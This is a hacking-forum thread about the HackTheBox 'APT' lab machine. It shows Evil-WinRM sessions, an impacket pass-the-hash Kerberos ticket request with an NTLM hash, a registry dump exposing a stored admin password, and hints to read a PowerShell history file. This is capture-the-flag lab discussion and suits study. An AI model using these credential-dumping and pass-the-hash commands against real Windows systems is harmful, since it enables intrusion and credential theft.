TUTORIAL apt.htb
by ARhOmOuTEd - November 02, 2020 at 04:46 PM
#37
I needed more coffee and -p- :D

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

Error: An error of type URI::InvalidURIError happened, message is bad URI(is not URI?): "http://dead:beef::b885:d62a:d679:573f:5985/wsman"

Error: Exiting with code 1

so

.... -i apt.htb

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents>

:)

:)
#38
(December 01, 2020 at 08:33 PM)bodiesplus Wrote: I needed more coffee  and -p- :D

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

Error: An error of type URI::InvalidURIError happened, message is bad URI(is not URI?): "http://dead:beef::b885:d62a:d679:573f:5985/wsman"

Error: Exiting with code 1

so

.... -i apt.htb

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents>

:)

:)

How did you find the username? Check my post on the last page
#39
(December 01, 2020 at 11:00 PM)runos Wrote:
(December 01, 2020 at 08:33 PM)bodiesplus Wrote: I needed more coffee  and -p- :D

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

Error: An error of type URI::InvalidURIError happened, message is bad URI(is not URI?): "http://dead:beef::b885:d62a:d679:573f:5985/wsman"

Error: Exiting with code 1

so

.... -i apt.htb

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents>

:)

:)

How did you find the username? Check my post on the last page

using rpcclient and the henry.vinson hash.

I am stuck with the root part. It seems the AV kills winPEAS or somehow it does not run.

Any hints ?

:)
#40
(December 01, 2020 at 11:45 PM)bodiesplus Wrote:
(December 01, 2020 at 11:00 PM)runos Wrote:
(December 01, 2020 at 08:33 PM)bodiesplus Wrote: I needed more coffee  and -p- :D

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

Error: An error of type URI::InvalidURIError happened, message is bad URI(is not URI?): "http://dead:beef::b885:d62a:d679:573f:5985/wsman"

Error: Exiting with code 1

so

.... -i apt.htb

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents>

:)

:)

How did you find the username? Check my post on the last page

using rpcclient and the henry.vinson hash.

I am stuck with the root part. It seems the AV kills winPEAS or somehow it does not run.

Any hints ?

:)

Can you explain how exactly you found that you should use henry.vinson user?
#41
Assuming apt6.htb is your ipv6 IP of the box

Get a kerberos ticket


getTGT.py HTB.local/[email protected] -hashes e53d87d42adaa3ca32bdb34a876cbffb:e53d87d42adaa3ca32bdb34a876cbffb

export [email protected]


Query the registry using impacket

reg.py -k apt.htb.local query -keyName HKU -s >> regdump.txt
Along the output you find


\Network\
\Software\
\Software\GiganticHostingManagementSystem\
        UserName        REG_SZ  henry.vinson_adm
        PassWord        REG_SZ  G1#[email protected]
\Software\Microsoft\
\Software\Microsoft\Active Setup\
\Software\Microsoft\Active Setup\Installed Components\


User winrm to log in to APT
#42
Has anyone found a walkthrough for this box yet?
#43
Hi guys, i need help rooting this box. Am stuck on user
#44
(December 20, 2020 at 02:21 AM)Buttmuncher Wrote: Has anyone found a walkthrough for this box yet?

C:\Users\henry.vinson_adm\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

... good luck ... :)
#45
I found the parameter
AuditPolicySD
REG_BINARY
01000000D08C9DDF0115D1118.....
But i not understud how decrypt it
I can use powershell convertto-securestring, but I need Key. Where to get it?

Or is it a rabbithole?
#46
(December 20, 2020 at 02:21 AM)Buttmuncher Wrote: Has anyone found a walkthrough for this box yet?
no, but what do you want to know?

(December 26, 2020 at 04:04 PM)djstoks Wrote: I found the parameter
AuditPolicySD     
REG_BINARY   
01000000D08C9DDF0115D1118.....
But i not understud how decrypt it
I can use powershell convertto-securestring, but I need Key. Where to get it?

Or is it a rabbithole?
this is a rabit hole, its about NTLMv1, like you can see in the consolehost_history.txt
#47
(December 27, 2020 at 09:25 AM)ARhOmOuTEd Wrote: no, but what do you want to know?

well, a walkthrough really. you know, things like the wordlists people used etc.
#48
(December 02, 2020 at 12:39 AM)joker0x90 Wrote: Assuming apt6.htb is your ipv6 IP of the box

Get a kerberos ticket


getTGT.py HTB.local/[email protected] -hashes e53d87d42adaa3ca32bdb34a876cbffb:e53d87d42adaa3ca32bdb34a876cbffb

export [email protected]


Query the registry using impacket

reg.py -k apt.htb.local query -keyName HKU -s >> regdump.txt
Along the output you find


\Network\
\Software\
\Software\GiganticHostingManagementSystem\
        UserName        REG_SZ  henry.vinson_adm
        PassWord        REG_SZ  G1#[email protected]
\Software\Microsoft\
\Software\Microsoft\Active Setup\
\Software\Microsoft\Active Setup\Installed Components\


User winrm to log in to APT

Nice, do you know how to priv esc on this machine?

Possibly Related Threads…
Thread Author Replies Views Last Post
TUTORIAL HTB - APT - Full tutorial EddieFlagg 39 9,373 April 18, 2021 at 09:25 PM
Last Post: DinkyDoodle
TUTORIAL APT htb i need help asalam 0 294 April 08, 2021 at 01:16 PM
Last Post: asalam
TUTORIAL HTB - You have been banned by HTB-Bot HDplus 23 3,724 March 27, 2021 at 11:11 PM
Last Post: throwawayzero

 Users browsing this thread: 1 Guest(s)